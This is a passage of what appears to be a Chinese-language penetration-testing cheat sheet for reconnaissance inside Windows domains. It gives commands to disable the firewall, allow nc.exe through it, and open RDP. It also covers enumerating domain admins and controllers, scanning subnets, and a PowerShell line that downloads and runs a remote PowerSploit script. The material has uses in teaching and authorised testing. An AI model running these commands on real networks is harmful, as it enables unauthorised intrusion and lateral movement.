<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">netsh firewall set allprofiles state off
</span></span></code></pre></td></tr></table>
</div>
</div><h5 id="修改防火墙配置">修改防火墙配置</h5>
<p>Windows2003之前版本</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">netsh firewall add allowedprogram c:\nc.exe <span class="s2">&#34;allow nc&#34;</span> enable
</span></span></code></pre></td></tr></table>
</div>
</div><p>Windows2003之后版本</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">netsh firewall add rule name=<span class="s2">&#34;pass nc&#34;</span> dir=in action=allow program=<span class="s2">&#34;C:\nc.exe&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>允许指定程序连出</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">netsh advfirewall firewall add rule name=<span class="s2">&#34;Allow nc&#34;</span> dir=out action=allow program=<span class="s2">&#34;C:\nc.exe&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>允许3389放行</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">netsh advfirewall firewall add rule name=<span class="s2">&#34;Remote Desktop&#34;</span> protocol=TCP dir=in localport=3389 action=allow
</span></span></code></pre></td></tr></table>
</div>
</div><h5 id="自定义防火墙日志的存储位置">自定义防火墙日志的存储位置</h5>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">netsh advfirewall firewall set currentprofile logging filename <span class="s2">&#34;C:\windows\temp\fw.log&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="查看代理情况">查看代理情况</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">reg query <span class="s2">&#34;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210113955.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210113955.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210113955.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210113955.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210113955.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210113955.png-water_print" /></p>
<h4 id="查询并开启远程连接服务">查询并开启远程连接服务</h4>
<h5 id="查看远程连接端口">查看远程连接端口</h5>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">reg query <span class="s2">&#34;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp&#34;</span> /V PortNumber
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210115055.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210115055.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210115055.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210115055.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210115055.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210115055.png-water_print" /></p>
<p>0xd3d转换成10进制为3389</p>
<h5 id="在windows-server2003中开启3389端口">在Windows Server2003中开启3389端口</h5>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">wmic path win32_terminalservicesetting where(__CLASS!=<span class="s2">&#34;&#34;</span>) call setallowtsconnections 1
</span></span></code></pre></td></tr></table>
</div>
</div><h5 id="在windows-server2008和windows-server2012中开启3389端口">在Windows Server2008和Windows Server2012中开启3389端口</h5>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS!=<span class="s2">&#34;&#34;</span>) call setallowsconnections 1
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName =’RDP-Tcp’) call 
</span></span><span class="line"><span class="cl">setuserauthenticationrequired 1
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">reg add <span class="s2">&#34;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&#34;</span> /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="自动化收集信息">自动化收集信息</h2>
<h2 id="empire下的主机信息搜集">Empire下的主机信息搜集</h2>
<h3 id="查看本机用户域成员密码设置时间剪切板内容系统基本信息网络适配器信息共享信息">查看本机用户、域成员、密码设置时间、剪切板内容、系统基本信息、网络适配器信息、共享信息</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">usemodule situational_awareness/host/winenum
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">situational_awareness/host/computerdetails
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="查询当前权限">查询当前权限</h2>
<h3 id="查询当前权限-1">查询当前权限</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">whoami
</span></span></code></pre></td></tr></table>
</div>
</div><p>三种情况：</p>
<ul>
<li>本地普通用户</li>
<li>本地管理员用户</li>
<li>域内用户</li>
</ul>
<h3 id="获取域-sid">获取域 SID</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">whoami /all
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114616.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114616.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114616.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114616.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114616.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114616.png-water_print" /></p>
<h3 id="查询指定用户的详细信息">查询指定用户的详细信息</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net user XXX /domain
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114719.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114719.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114719.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114719.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114719.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114719.png-water_print" /></p>
<h2 id="判断是否存在域">判断是否存在域</h2>
<h3 id="使用-ipconfig-命令">使用 ipconfig 命令</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">ipconfig /all
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查看系统详细信息">查看系统详细信息</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">systeminfo
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查询当前登录域及用户信息">查询当前登录域及用户信息</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net config workstation
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114956.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114956.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114956.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114956.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114956.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211114956.png-water_print" /></p>
<h3 id="判断主域">判断主域</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net time /domain
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211115058.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211115058.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211115058.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211115058.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211115058.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200211115058.png-water_print" /></p>
<p>执行命令后，存在三种情况：</p>
<ul>
<li>存在域：当前不是域用户
<ul>
<li>发生系统错误</li>
</ul>
</li>
<li>存在域：且当前用户是域用户
<ul>
<li>如上图</li>
</ul>
</li>
<li>当前网络环境为工作组
<ul>
<li>找不到域控制器</li>
</ul>
</li>
</ul>
<h2 id="探测内网存活主机">探测内网存活主机</h2>
<h3 id="利用-netbios-快速探测内网">利用 NetBIOS 快速探测内网</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">nbtscan.exe 192.168.1.0/20
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="利用-icmp-协议快速探测内网">利用 ICMP 协议快速探测内网</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl"><span class="k">for</span> <span class="k">/L</span> <span class="nv">%I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%</span>I <span class="p">|</span> findstr <span class="s2">&#34;TTL=&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="通过-arp-扫描探测内网">通过 ARP 扫描探测内网</h3>
<h4 id="arp-scan工具">arp-scan工具</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">arp.exe -t 192.168.1.0/20
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="empire-中的-arpscan-模块">Empire 中的 ARPscan 模块</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">usemodule situational_awareness/network/arpscan
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="nishang-中的-invoke-arpscanps1-脚本">Nishang 中的 Invoke-ARPScan.ps1 脚本</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">powershell.exe -exec bypass -Command <span class="s2">&#34;&amp;{Import-Module C:\windows\temp\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24}&#34;</span> <span class="p">&gt;&gt;</span> C:\Windows\temp\log.txt
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="扫描内网端口">扫描内网端口</h3>
<h4 id="metasploit-端口扫描">metasploit 端口扫描</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">auxiliary/scanner/portscan/tcp
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="powersploit-的-invoke-portscanps1-脚本">PowerSploit 的 Invoke-portscan.ps1 脚本</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">powershell.exe -nop -exec bypass -c <span class="s2">&#34;IEX (New-ObjectNet.WebClient).DownloadString(&#39;https://raw.githubusercontent.com/POwershellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1&#39;);Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports &#39;445,1433,8080,3389,80&#39; -oA c:\windows\temp\rex.txt&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="nishang-的-invoke-portscan-模块">Nishang 的 Invoke-PortScan 模块</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="nb">Invoke-Portscan</span> <span class="n">-StartAddress</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">250</span><span class="p">.</span><span class="n">1</span> <span class="n">-EndAddress</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">250</span><span class="p">.</span><span class="n">255</span> <span class="n">-ResolveHost</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="端口-banner-信息">端口 banner 信息</h4>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200212095532.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200212095532.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200212095532.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200212095532.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200212095532.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200212095532.png-water_print" /></p>
<h2 id="收集域内基础信息">收集域内基础信息</h2>
<h3 id="查询域">查询域</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net view /domain
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查询域内所有计算机">查询域内所有计算机</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net view /domain:HACKE
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查询域内所有用户列表">查询域内所有用户列表</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net group /domain
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查询域内所有成员计算机列表">查询域内所有成员计算机列表</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net group <span class="s2">&#34;domain computers&#34;</span> /domain
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查询域密码信息">查询域密码信息</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net accounts /domain
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="获取域信任信息">获取域信任信息</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">nltest /domain_trusts
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="查找域控制器">查找域控制器</h2>
<h3 id="查看域控制器的机器名">查看域控制器的机器名</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">nltest /DCLIST:DomainName
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查看域控制器的主机名">查看域控制器的主机名</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">nslookup -type=SRV _ldap._tcp.
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查看当前时间">查看当前时间</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net time /domain
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查看域控制器组">查看域控制器组</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net group <span class="s2">&#34;Domain Controllers&#34;</span> /domain
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">netdom query pdc
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="获取域内的用户和管理员信息">获取域内的用户和管理员信息</h2>
<h3 id="查询所有域用户列表">查询所有域用户列表</h3>
<h4 id="向域控服务器进行查询">向域控服务器进行查询</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net user /domain
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="获取域内用户的详细信息">获取域内用户的详细信息</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">wmic useraccount get /all
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="查看存在的用户">查看存在的用户</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">dsquery user
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="查询本地管理员组用户">查询本地管理员组用户</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net localgroup administrators
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查询域管理员用户">查询域管理员用户</h3>
<h4 id="查询域管理员用户-1">查询域管理员用户</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net group <span class="s2">&#34;domain admins&#34;</span> /domain
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="查询管理员用户">查询管理员用户</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net group <span class="s2">&#34;Enterprise Admins&#34;</span> /domain
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="定位域管理员">定位域管理员</h2>
<h3 id="常用工具">常用工具</h3>
<h4 id="pslogonexe">pslogon.exe</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">pslogon.exe \\DC
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="pvefindaduserexe">PVEFindADUser.exe</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">PVEFindADUser.exe -current
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="netviewexe">netview.exe</h4>
<h4 id="nmap的脚本">nmap的脚本</h4>
<ul>
<li>对域控进行信息搜集，可以获取主机信息，用户等信息
<ul>
<li>smb-enum-sessions.nse</li>
</ul>
</li>
<li>获得某台主机的权限，但是无法获取更多的域用户信息
<ul>
<li>Smb-enum-users.nse</li>
</ul>
</li>
<li>遍历远程主机的共享目录
<ul>
<li>smb-enum-shares.nse</li>
</ul>
</li>
<li>对主机远程进程进行遍历
<ul>
<li>smb-enum-process.nse</li>
</ul>
</li>
<li>对主机的操作系统，计算机名，域名，域林名称，NetBIOS机器名，工作组，系统时间等信息
<ul>
<li>smb-os-discovery</li>
</ul>
</li>
</ul>
<h4 id="powerview脚本">powerview脚本</h4>
<ul>
<li>Invoke-StealthUserHunter</li>
<li>Invoke-UserHunter</li>
</ul>
<h4 id="empire-的-user_hunter模块">Empire 的 user_hunter模块</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">usemode situational_awareness/network/powerview/user_hunter
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="查找域管进程">查找域管进程</h2>
<h3 id="本机检查">本机检查</h3>
<h4 id="获取域管理员列表">获取域管理员列表</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net group <span class="s2">&#34;Domain Admins&#34;</span> /domain
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="列出本机的所有进程及进程用户">列出本机的所有进程及进程用户</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">tasklist /v 
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="查询域控的域用户会话">查询域控的域用户会话</h3>
<p><a href="https://github.com/nullbind/Other-Projects/tree/master/GDA" target="_blank" rel="noopener noreffer">https://github.com/nullbind/Other-Projects/tree/master/GDA</a></p>
<h3 id="查询远程系统中运行的任务">查询远程系统中运行的任务</h3>
<p>首先，从<code>Domain Admins</code>组中收集域管理员列表</p>
<p>然后，将目标 <code>ip</code> 加到 <code>ips.txt</code> ，将收集的域管理员列表加到 <code>names.txt </code> 文件。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
